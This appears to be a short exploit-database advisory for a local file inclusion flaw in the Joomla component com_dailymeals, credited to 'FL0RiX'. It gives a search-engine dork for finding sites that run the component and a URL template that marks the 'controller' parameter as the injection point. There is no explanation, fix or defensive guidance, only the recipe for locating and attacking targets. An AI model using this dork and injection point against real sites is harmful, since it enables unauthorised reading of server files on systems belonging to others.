id: 10567
date: 01/02/2010
title: Joomla Component com_dailymeals LFI Vulnerability
author: Fl0riX
cves: 

=================================================
Joomla Component com_dailymeals LFI Vulnerability
=================================================

@~~=======================================~~@
 
@~~=Script   : Joomla Component com_dailymeals
 
@~~=Author   : FL0RiX

@~~=Home : www.oltan.org
 
@~~=Bug Type : Local File Inlusion(LFI)
 
@~~=Dork : inurl:"com_dailymeals"
 
@~~=======================================~~@
 
@~~=Vuln
 
http://server/ [Yol] /index.php?option=com_dailymeals&view=dailymeals&controller=[-LFI-]



#  0day.today [2023-03-26]  #